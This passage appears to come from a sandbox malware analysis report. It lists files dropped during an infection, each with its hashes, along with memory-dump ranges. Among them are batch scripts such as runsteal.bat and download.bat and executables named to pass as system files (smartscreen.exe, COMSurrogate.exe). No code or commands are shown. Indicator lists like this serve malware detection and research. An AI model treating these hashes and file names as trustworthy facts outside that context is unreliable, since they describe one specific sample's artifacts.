SHA512 57d56de2bb882f491e633972003d7c6562ef2758c3731b913ff4d15379ada575062f4de2a48ca6d6d9241852a5b8a007f52792753fd8d8fee85b9a218714efd0

memory/1888-477-0x0000000060900000-0x0000000060992000-memory.dmp

memory/1888-476-0x0000000000400000-0x00000000006DF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Dentists

MD5 895c5374a042a9e6c78c673690cd2275
SHA1 9dfe1b532f958f678de2bac7c74646e007a8fa14
SHA256 226099aac21e8d4a671a68b37d204339703fb696b6cc5aa30311fb55d6ab2147
SHA512 130af34bb1d12db8e86b930d8e490754687e1381a0104ac4c98cc2f02ff7fc4ed9e1d549121a013e1c32663a00d1dc8eb20d2f9831feb3c7eb17bf61a1d8d52c

C:\Users\Admin\AppData\Local\Temp\Flavor

MD5 d9182f7a263f19b9876e7e1568e6c760
SHA1 d0683b5a7247a2f4a69473165d2c2649f2e1c01f
SHA256 4efff79e94f136f9bbaed62501810937785831b8c10ee9eb675ceae24cf3c4c9
SHA512 85582b94da822580eb26bc477440d87fb0a9ed98e3b75166cd96c2a18c88367c8bdd808fc43c52c2078e625efd81983e9f2e733272289833700649ad58a96a9b

C:\Users\Admin\AppData\Local\Temp\Disturbed

MD5 0e2df9a4f4d78ad0299f0377d417b39e
SHA1 a2452ab3b04b480dfc2a58a416762e280254751f
SHA256 8834f63f09734b9f284437f26cba4909ce9ae1aceafa27e2bcd7531c1a7479df
SHA512 d8194f24cc02fc030c7cf1dab5970257a79b8bcc887a8ff1ccd104e94ea809dcd266b056c80e6a0e73cba71f81e654389025c939e3135f6fafca9d51737812b8

C:\Users\Admin\AppData\Local\Temp\Artistic

MD5 d35007cc8b2860b1fe9ee861e1f2846d
SHA1 58638fd185601506b3b13fe254065aeb7edff28c
SHA256 de1e4dbe18f0b926b49aceb10157bc7f542409bad6242422efef3b831608a037
SHA512 45f851201656cb19c89274d124a7625a4c9fe12f412616a84458aa1857c61455126264416ff7fa1c9ffa99b994613baecfacd1f8179240a5021c7e5b867ea068

C:\Users\Admin\AppData\Local\Temp\Revenue

MD5 aabc90b85b9c3b51543de0339d29778e
SHA1 299f5e2ca9326e0a5feefb4fc7b05da93cfd11a1
SHA256 9a0a3567f4c9b9ca46fbf41d65cdd5ce464b0efe42d6aaf7cff840addbe05d60
SHA512 3d951489d7d46874909bfd82e9cac346bdd15bbb485fc76e1ed7d6fe7bb51a7649d1f649b75bb6f6f1b6f10ea16113cd01c20aa7ea85d038fcb7fe317082edf3

C:\Users\Admin\AppData\Local\Temp\Soundtrack

MD5 b75737c804ca9949cc63bd42c945a5e6
SHA1 75c0490174adc40d1824b1024021b82dd5c762b7
SHA256 628068ee856d68776d6e9b755cd42d7a5a46af1a2a6a2c22e65db95b5d2d8f2c
SHA512 58fedd2bd6318d4b93de429d184701e059321c16872cafc978837c29985404bf432e4a2701894f7f67045f9684da40c8e14f9f557da3398c5d6eeca2e18faca7

C:\Users\Admin\AppData\Local\Temp\Zip

MD5 84f05dddefb1c72567827be553fe67fe
SHA1 c2ebcc4de3439a8206aa8faac90312bfb207ce4f
SHA256 b7de8d92196f323eb9a6237b9e902461569fd093b36e1988dee9de2ab157bb12
SHA512 99954fa07fe7cc0e54dbd0af09b32507cd998c8b44cb63f1ffe8e30667b6d1bb0949a6c95b60e40e73f0b0bb3f11e79f8fa23f696032118210cd10f03eec2904

C:\Users\Admin\AppData\Local\Temp\Proceeds

MD5 de061b898e12d89c92409f220918347f
SHA1 6b571edab30dcc4d5518e5bebb296d1f7bf5414c
SHA256 70fda66f3ea2607d6cff63d0a6a7258577690d2a9bc5105bb529889ce025d1c2
SHA512 61d94f04572643dc4274aedda51e7cb6bcccefcfa4556e6d87f94195ddf90ffbeb65909688c7bc3407f244021cc6dff0c8692fd7835ee61e6a43a0394a693a2b

C:\Users\Admin\AppData\Local\Temp\Justice

MD5 774df02c553d130dde3aa7496b64ebed
SHA1 e2a4aab8c3b654bd022662045fa70413a80e55f9
SHA256 ae9283c1a14b751639a75592295d85105954b761737ab77fc1e667a1498f2e9e
SHA512 c132cdf383e4fa32362d50768898ed9c6cd1e306056d066168a8ac1ee3ea7953424ff3b241ff1e0376b99b91f566b698bfef07da9bc45471097a6637dc154d11

C:\Users\Admin\AppData\Local\Temp\491505\B

MD5 0a1e63fc10dd1dbb8b2db81e2388bf99
SHA1 67ad39aabbf4875bc1b165ccd5afc40194d1d3c8
SHA256 122991768f589431b9166a4e22523bf48a53efff73fc2b191955e604196541b7
SHA512 94c50f06e1d157381b9d0746044b5d015e2946b44291d92739783cb3ed9e91371cf7d1b981d3108d910d7a7000810fe69fbe6590f9a84f822b671866ab9db5fc

memory/2564-531-0x0000000000D60000-0x0000000001202000-memory.dmp

memory/1500-535-0x0000000000F30000-0x00000000013BC000-memory.dmp

memory/1888-536-0x0000000000400000-0x00000000006DF000-memory.dmp

memory/2564-545-0x0000000000D60000-0x0000000001202000-memory.dmp

memory/1500-548-0x0000000000F30000-0x00000000013BC000-memory.dmp

memory/1888-549-0x0000000000400000-0x00000000006DF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1012576001\1dd8bdd825.exe

MD5 343a771efad9c921a3abb8d4201f6040
SHA1 b142b17a0dfb82b75071950eba743d0150ad12ff
SHA256 6d08fa0a96bed6936121d80a60807e6682f0e1ce65f4fca2006fffcf109aa85e
SHA512 d0ebd4de115ae62ea6d7aee7e636f767fe8823b09a0beb22bf64805ea4f01034b7b89092fe0083d9bc694fea3fe2d457aeadff49b4a17c81bc099861620c91e2

memory/2388-569-0x0000000000970000-0x0000000000E6F000-memory.dmp

memory/2564-565-0x0000000000D60000-0x0000000001202000-memory.dmp

memory/2388-571-0x0000000000970000-0x0000000000E6F000-memory.dmp

memory/1888-572-0x0000000000400000-0x00000000006DF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1012577001\69efc78da7.exe

MD5 8746d7ddcd593e7a9a38016b27a6dde0
SHA1 a505737a7bebefbd81d28d729e26187d15ea3aa7
SHA256 159e04da0b72590135477fa37369439acc2dd400ba28af7597ab05f0be906280
SHA512 9d2c4372c85f2f176f5034c4eb54ba1290260b69cd760fb17e7f3a54ecb490290fa033716f2019231c50b321d314e36b5d6003253e176be8d250cbe689e45b52

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4ws2kncw.default-release\datareporting\glean\db\data.safe.bin

MD5 7d530660909d5c3c0cd9924589e3debd
SHA1 f450f73ea7895ae450196da3512fed9f947d2733
SHA256 de0838186dd6e25c5a853345b55edc3ad69043baadac927a4f23b712a33d2f99
SHA512 c155c25d8d66a1bbec983c2b3f508afa6f0aa70efb72a6a346e4bc000c80137c8c242657d0e2f41aa14c4a9caa17ff3758bcdf3ba201311a0df7b74cd2a6df6e

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4ws2kncw.default-release\datareporting\glean\db\data.safe.tmp

MD5 d6da39c2e4466300f5f4f9ed80dce6c0
SHA1 a12496e0edd7347e3c9ea1f75403e2551d0eb570
SHA256 e5c250ba7d29fdfaad27f9d6fd033c1976aec48312635babdc17a83c0be75bda
SHA512 366de3d60123b7e4fafa82a09dd499a13436bf7cf68f0625a16ab2f3c6492150468fa6ca67a6aacdb70cf7dad95d884a4000b1b665b5b323e09164ea36bb958c

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4ws2kncw.default-release\datareporting\glean\pending_pings\8f860d63-526d-4857-ba55-6808570005f6

MD5 52d9d7c2f84996a6701eea97f78c3203
SHA1 d8c8aa6253ae6ea471954266e1cd97e50663ef9c
SHA256 d2744be187dcabd196abe082ac76eba9860ce6e290b0fd2578c03847f56a3035
SHA512 913903739fa35db6b9b3e49f0921549b4b44ee0f0ce92bc339d5e28d96a4d91a132afc50f7bb9f0909c8e6a3cdc9a68bda20cdcf334fafecfd3c9e0c20f1822d

C:\Users\Admin\AppData\Local\Temp\1012578001\b3da59fcc7.exe

MD5 fc6804a55358a117689dab9333fd0ee5
SHA1 bbe4309bc6d99a67ecc0e866907889659d8e7031
SHA256 4decdc379789942364429bbbed02dda060d79e613ed657ca541fd5f37873fd58
SHA512 6a7b08a022cb25bfa0f906ba50a322bf3a7333e28d083d73c848d220789530f6ad31a65c0b7baf062c3cb5be30128a9af0d3fb43ea714f72f7b1b7bcf622271c

memory/6684-1118-0x00000000008E0000-0x0000000000B88000-memory.dmp

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4ws2kncw.default-release\activity-stream.discovery_stream.json.tmp

MD5 ae88242849a6d51be04b78fbf8b74631
SHA1 a8838e7963aba8c3714122d4206014f30a331124
SHA256 8d07e2105479829456f1ec6cc8b21b7c847aae9a789e9c97a5972b5de5d9ed0e
SHA512 6e5c297b69e1e7ba00e029159085b8e21d9f59eb2c6da6a02b06cca4e8ab88df7133e3cbf805bf19283d71c7187313cf298ff7299b43366dae3619537d80a35f

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4ws2kncw.default-release\datareporting\glean\db\data.safe.tmp

MD5 d945fbb3b924db1e1211b0722639931f
SHA1 900e40b75656ac6538f30cdc31419ba624c273b5
SHA256 5da6c6afe36e513113146d84a72d0952909a5de715c0c9243c960fcd3f1bae8b
SHA512 fcf92f0ed5bd394b0d378c6af7978e452f4dd503cd3e6af826d6a0122c4673fef5df9a80a41ec56e0f5c5a6655776f5fb4b62fa4cb69b23b829a5e7ac8ebde2b

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4ws2kncw.default-release\prefs.js

MD5 240aa917606e9603d9c56531e5fcc248
SHA1 ec084cda1ef97c713b9895689792170f0e2bc6b5
SHA256 0a0073df79b9f2edf714717e95139fcb3c7018d6fdb4ce284d177d8a2ed1570c
SHA512 642b7a91e05dab7eba7cc24800aa326b601a4a8c501743a0122f2930490ffb5e9f4f1caf9463097a605f5604acf11bd25a603befe3bbb726fff2d7af2078a708

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4ws2kncw.default-release\datareporting\glean\pending_pings\697b3d51-6d7f-4ae5-903b-f565634fa029

MD5 5ba97bb6d510af87c8a930c37413985a
SHA1 78eb784564b8eefff844205beac5282ce84cedfb
SHA256 6f49eb4e5c48b68dff9ee2f68f37867e925a3c91ff343ff28e9cebe702e8300b
SHA512 0a6bd60ddb6c7b699a85a2375706d9fb74ec5ce1024290d2c64814e074041e316f9c3b2b4b9e862d9b5d2879e1e3b4f892dc2e438313b9d24f71e7baf682a453

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4ws2kncw.default-release\datareporting\glean\db\data.safe.tmp

MD5 f659f863761511507928ff4e38643533
SHA1 fa365535eaa24f444102c0d2ffd964dbc4bd038d
SHA256 a5f00757e75878dd37423f2f79d21677121e9aa858c5d0efb15ea4afe0620c69
SHA512 902e0b0d88ddd2b39eb702c126476a612945d25a49214b535e47d7f34547cd76f8e30266cf9282994e4600fc0cb9695f4f1621c219858831d56cf0ae30ac4592

memory/6684-1226-0x00000000008E0000-0x0000000000B88000-memory.dmp

memory/2564-1242-0x0000000000D60000-0x0000000001202000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4ws2kncw.default-release\AlternateServices.bin

MD5 e970bedd5f188f99b24391a6e2910091
SHA1 70824f6958e3caba4215f8aa5898cd73ec042e0e
SHA256 8118cbe7b27682f8755bf6b7244c926c3fee3b8fc73b74703e2fd8d28d1b52cd
SHA512 bb921a6762cc914c5e257a660d2f24600e4b24fcddf6b42851e25cea6e9c00ec970fa6bd5f0f0651c0b2601bedfcefb5ad1c8bbfe8d6ffcfd43d11f1f67d04f6

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4ws2kncw.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl

MD5 96c542dec016d9ec1ecc4dddfcbaac66
SHA1 6199f7648bb744efa58acf7b96fee85d938389e4
SHA256 7f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798
SHA512 cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658

memory/6684-1227-0x00000000008E0000-0x0000000000B88000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4ws2kncw.default-release\prefs-1.js

MD5 a42d38da8ba7c3fcc98a958fd9352148
SHA1 a9d785a215120ed13d294d9de048120d2339b4fc
SHA256 296039ffd03de53a819bc50221b30f4c4acab160928665ef183f7d79e99ff016
SHA512 612d12aaeea220a07746d941c0639c3d6f96af597810ccd85dbc383645efcce5773a1c441ac50173240f729df9543b7517ea780f369db1a975dd036fdbe1a1e6

memory/3548-1290-0x0000000000D00000-0x0000000001104000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\491505\RegAsm.exe

MD5 0d5df43af2916f47d00c1573797c1a13
SHA1 230ab5559e806574d26b4c20847c368ed55483b0
SHA256 c066aee7aa3aa83f763ebc5541daa266ed6c648fbffcde0d836a13b221bb2adc
SHA512 f96cf9e1890746b12daf839a6d0f16f062b72c1b8a40439f96583f242980f10f867720232a6fa0f7d4d7ac0a7a6143981a5a130d6417ea98b181447134c7cfe2

memory/3548-1293-0x0000000003170000-0x000000000317E000-memory.dmp

memory/3548-1294-0x0000000005580000-0x00000000055DC000-memory.dmp

memory/3548-1295-0x0000000005ED0000-0x0000000006474000-memory.dmp

memory/3548-1296-0x0000000005920000-0x00000000059B2000-memory.dmp

memory/1888-1297-0x0000000000400000-0x00000000006DF000-memory.dmp

memory/3548-1299-0x0000000005850000-0x0000000005862000-memory.dmp

memory/3548-1300-0x0000000005E00000-0x0000000005E08000-memory.dmp

memory/3548-1301-0x0000000005E20000-0x0000000005E28000-memory.dmp

memory/3548-1302-0x0000000005E30000-0x0000000005E38000-memory.dmp

memory/3548-1303-0x0000000005E40000-0x0000000005E58000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1012579001\4fe69191d8.exe

MD5 623d073b8d01e00cbb5294ff07fe238a
SHA1 c3aeeb4de6cd38209944e7a1c3ecaa3f411f8775
SHA256 ce50862f51244b9dce6dbde2bc96fa852cff8ca84b720797894a3f43f4e293ca
SHA512 dc1fe9e39173bfd1e2722125b1385cf8c15e2570b65c1d5acb320a70d073d39a1a25f3665a87ccb3b8a0aaf7b7e63edb21e8e3cd4c3ac27e9cda237b54979824

memory/3548-1320-0x00000000065D0000-0x00000000065E0000-memory.dmp

memory/3548-1319-0x0000000006BB0000-0x00000000071D8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0lz22qiw.mdy.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3548-1333-0x0000000007220000-0x000000000723A000-memory.dmp

memory/5732-1334-0x0000000000400000-0x0000000000C62000-memory.dmp

memory/3548-1335-0x0000000007280000-0x00000000072B6000-memory.dmp

memory/3548-1336-0x0000000007940000-0x0000000007FBA000-memory.dmp

memory/3548-1337-0x00000000074A0000-0x0000000007536000-memory.dmp

memory/3548-1338-0x00000000076B0000-0x00000000076D2000-memory.dmp

memory/3548-1340-0x00000000076E0000-0x00000000076FE000-memory.dmp

memory/3548-1341-0x00000000077C0000-0x000000000780A000-memory.dmp

memory/3548-1339-0x0000000007750000-0x00000000077B6000-memory.dmp

memory/3548-1348-0x00000000084D0000-0x0000000008536000-memory.dmp

memory/3548-1347-0x00000000080C0000-0x0000000008414000-memory.dmp

memory/3548-1349-0x0000000008570000-0x0000000008592000-memory.dmp

memory/3548-1351-0x0000000008810000-0x000000000885C000-memory.dmp

memory/3548-1366-0x0000000009BD0000-0x0000000009BEE000-memory.dmp

memory/3548-1367-0x0000000009C70000-0x0000000009D13000-memory.dmp

memory/3548-1368-0x0000000009C30000-0x0000000009C3A000-memory.dmp

memory/3548-1369-0x0000000009D20000-0x0000000009D31000-memory.dmp

memory/3548-1370-0x0000000009D40000-0x0000000009D4E000-memory.dmp

memory/3548-1371-0x000000000A010000-0x000000000A024000-memory.dmp

memory/3548-1372-0x000000000A050000-0x000000000A06A000-memory.dmp

memory/3548-1373-0x000000000A070000-0x000000000A078000-memory.dmp

memory/3548-1374-0x00000000088F0000-0x00000000088FA000-memory.dmp

memory/3548-1376-0x000000000A040000-0x000000000A658000-memory.dmp

memory/3548-1377-0x0000000008D30000-0x0000000008D42000-memory.dmp

memory/3548-1378-0x0000000008D90000-0x0000000008DCC000-memory.dmp

memory/3548-1379-0x0000000008F00000-0x000000000900A000-memory.dmp

memory/3548-1380-0x00000000091E0000-0x00000000093A2000-memory.dmp

memory/6684-1381-0x00000000008E0000-0x0000000000B88000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\download.bat

MD5 f2a75175c8082ccd3e1713b00556a6e2
SHA1 2f5dc37978320bc1ca207c0c0aff1240aad6c7cf
SHA256 019157c15709f7d6301cb0fb15f45c054230ea91f06ff817b426d7f6ccb14686
SHA512 011ab44e81d61636d5b1637584faf0701a5b2226289b6200cd89ad97927f52f1c659df626afc2b46edd656960d67934fff97f5e10fd6a7454027d430feafa7a9

memory/2564-1401-0x0000000000D60000-0x0000000001202000-memory.dmp

memory/6684-1407-0x00000000008E0000-0x0000000000B88000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\smartscreen.exe

MD5 1fed66d1f6b85bda20fe0403ca01c9bd
SHA1 6a3056191a7d8da167285b2bf5f9fa671022c8c1
SHA256 924ee12f6a98aeeb1c7836ec8984f0f93216bfff0433bcd4ee643d33d96db74a
SHA512 0fb1397078689a52d1c77cc239b1e42afa5ff87a3f5b4f825705e9bda1bd2c58bfb50a6067ea0a202fa7edb0a890cbac9314413fc8757c8b75a43fa0b12ef613

memory/6616-1422-0x0000022283A50000-0x0000022283A7E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\runsteal.bat

MD5 744f8978db36b4b9db7cb6e5c8c41e08
SHA1 84321921f622d20a4d40c9bef43b7744e74aaee7
SHA256 cedfe277f8c600679365ce2c54a9c303907a0acadc23ed6e6968746d2e8ca468
SHA512 d1584b2134bf3960af33a514b3a9fba69c7eb2fbbc3b0cffe7e493f182b20547f7596012fcc5e6b5ffbefee5a0b7d1afe45eee822cff5b0720ffd6292af2394f

memory/6456-1427-0x0000000007B00000-0x0000000007B32000-memory.dmp

memory/6456-1438-0x0000000007B40000-0x0000000007BE3000-memory.dmp

memory/6456-1428-0x000000006EB90000-0x000000006EBDC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\checkmiexe.bat

MD5 d1fdfad5ce7134b1ef5a54cf37001031
SHA1 82e0f4e953b3aeaca622ec071639baf6ae17aadb
SHA256 54f8474d983dc3dd78e3d3289076152651e2f8cc5f30ae3f2740ba15e71cc6a6
SHA512 b6b7b4f134a6b436cd32e39fb645d91acc12482d352158a755359d0f6cbb8fd5bab9351081916b0b638e3ff2bde4b6ac2f6202f3ca58f1146f39defc039e88e7

memory/6456-1449-0x0000000007E70000-0x0000000007E81000-memory.dmp

memory/6456-1459-0x0000000007EB0000-0x0000000007EC4000-memory.dmp

memory/1888-1460-0x0000000000400000-0x00000000006DF000-memory.dmp

memory/1888-1464-0x00000000009E0000-0x0000000000A81000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 968cb9309758126772781b83adb8a28f
SHA1 8da30e71accf186b2ba11da1797cf67f8f78b47c
SHA256 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA512 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 3cbbd23e401cd6493403e366be8e2a08
SHA1 307c905805d256a0031957c6d8012dfe1f29270e
SHA256 699a78b4f2dd345e186823206efeefa12ab2a85e9a760e44738138ac451292d6
SHA512 d7f4ad629667e41823625a11c8da88eb4ad54bd2c2935fc38c94ab4a3e7535da4dec4423c966a300141f1faeb1e1c5ee7d901d92f35e18c9b029fbc3486b2fd4

memory/5188-1477-0x000000006EB90000-0x000000006EBDC000-memory.dmp

memory/5188-1487-0x0000000007090000-0x0000000007133000-memory.dmp

memory/5732-1489-0x0000000000400000-0x0000000000C62000-memory.dmp

memory/5732-1488-0x0000000000400000-0x0000000000C62000-memory.dmp

memory/5188-1490-0x00000000073D0000-0x00000000073E1000-memory.dmp

memory/5188-1492-0x0000000007420000-0x0000000007434000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\downloaded_script.bat

MD5 da7552eed00789bd53f831e67cf54f8d
SHA1 653b2ec2b0975ab4b11f1c35a10e307c95450f17
SHA256 5cb4de27952514f557cf52a3a90b68f7c62a512732e799c766a85c4f7905f38f
SHA512 f618164b414a91ccb3569b85fad155fbb55defc55dfc5e2a48ee59f25307182ab2e3d9f8dddffc950cd6397442a876922608c0bbcc447ec0fc56f12446418bfc

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 29cf49326e382aae24d776fa6062c0ee
SHA1 054ebe60b02f74750903cfcd153f6ab2c5f2ea4b
SHA256 f0de72f3dc555387b027f88ec3a26548c2385861feb9ec6d4b578f3fd2581701
SHA512 97e021e28184456eafb5d293db92dead0d711afb9038635dc0b74cafa3065dbf8959c5af9e63090f548cdd67d89c93edaea0f1693281a5b26405c1c2ede46f84

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 9ef735b02779a95afb4db09fd4d32359
SHA1 625aad54e9ab3964cc09d0bfa6e9dc7379607717
SHA256 0a577e3d8bf1ff31ac2efda84f5d3b98ad0f593590568054654a3cc0d423152a
SHA512 5e1830f24bc94ccbdf4f0cf5489efb2147bd5a101214054e67dde075867e648555ac2953b850f58f7bf3fdbbbd9d3edd8e74ec657a6ba2488740df00dd56a3df

C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 b5832bacf67fc3dfce849295c432f6e8
SHA1 a97230f90c5b0541f94d531d1dd622106a284d55
SHA256 2335070b5dd1c40ed4490a3beb45c17c60e748cac50398d457abe2c64104fc11
SHA512 a89ef305ed068ee9a11c3292ae89e6938dabc7baf02006457956ffa3437b41ed90f7ad14a27d2023de7b6181375b832383e2cb31e1128c0bbf1c7c3ae864bae3

memory/6300-1562-0x00000164020A0000-0x00000164020CE000-memory.dmp

memory/4524-1563-0x000000006EB90000-0x000000006EBDC000-memory.dmp

memory/6604-1577-0x0000000000D60000-0x0000000001202000-memory.dmp

memory/4524-1578-0x0000000007EB0000-0x0000000007EC2000-memory.dmp

memory/4524-1579-0x0000000007EA0000-0x0000000007EAA000-memory.dmp

memory/6604-1582-0x0000000000D60000-0x0000000001202000-memory.dmp

memory/2564-1584-0x0000000000D60000-0x0000000001202000-memory.dmp

memory/1888-1592-0x0000000000400000-0x00000000006DF000-memory.dmp

memory/5732-1596-0x0000000000400000-0x0000000000C62000-memory.dmp

memory/2564-1628-0x0000000000D60000-0x0000000001202000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmpaddon

MD5 09372174e83dbbf696ee732fd2e875bb
SHA1 ba360186ba650a769f9303f48b7200fb5eaccee1
SHA256 c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f
SHA512 b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4ws2kncw.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info

MD5 2a461e9eb87fd1955cea740a3444ee7a
SHA1 b10755914c713f5a4677494dbe8a686ed458c3c5
SHA256 4107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc
SHA512 34f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4ws2kncw.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll

MD5 842039753bf41fa5e11b3a1383061a87
SHA1 3e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153
SHA256 d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c
SHA512 d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4ws2kncw.default-release\prefs-1.js

MD5 465bbf30db2ad07075705f63ff9a3ba5
SHA1 84bb4b8003638a789c8e407ddb7c01f280b4c43c
SHA256 f91e087a73d66b874674b248bcf22076dbecd84273e887ac9986e5aa59316c7b
SHA512 0dab4c0b560a35e81fefa7e89a823c1269b6f260fc53d53c2cce9a4ff2067d78df11dd36fc1d073b7683c6f8648f3522954cc5564aa448cd63ac967016372c20

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4ws2kncw.default-release\AlternateServices.bin

MD5 749a21318675d2f04cdbbb3b59820242
SHA1 bfc4f9a149c3d30c1eecf5d76ae8f75d9f235916
SHA256 56cef1f09308430fb66cddbba0bcd5a43b72fbe5ad258e9ee00f4a0bfc3f3ab9
SHA512 d3c647380e7db943a14afe5738c11e740995b132525eeb5c75aab10aae1d7915312e80582c6c6d0f4e094f8ee73360cc6e1a6ff3d453c7a437cb0870c391e4b8

C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

MD5 0a8747a2ac9ac08ae9508f36c6d75692
SHA1 b287a96fd6cc12433adb42193dfe06111c38eaf0
SHA256 32d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03
SHA512 59521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4ws2kncw.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll

MD5 daf7ef3acccab478aaa7d6dc1c60f865
SHA1 f8246162b97ce4a945feced27b6ea114366ff2ad
SHA256 bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e
SHA512 5840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4ws2kncw.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json

MD5 bf957ad58b55f64219ab3f793e374316
SHA1 a11adc9d7f2c28e04d9b35e23b7616d0527118a1
SHA256 bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda
SHA512 79c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e

memory/1888-1686-0x0000000000400000-0x00000000006DF000-memory.dmp

memory/5732-1692-0x0000000000400000-0x0000000000C62000-memory.dmp

memory/2564-1705-0x0000000000D60000-0x0000000001202000-memory.dmp

memory/1888-1709-0x0000000000400000-0x00000000006DF000-memory.dmp

memory/940-1753-0x0000000000D60000-0x0000000001202000-memory.dmp

memory/940-1755-0x0000000000D60000-0x0000000001202000-memory.dmp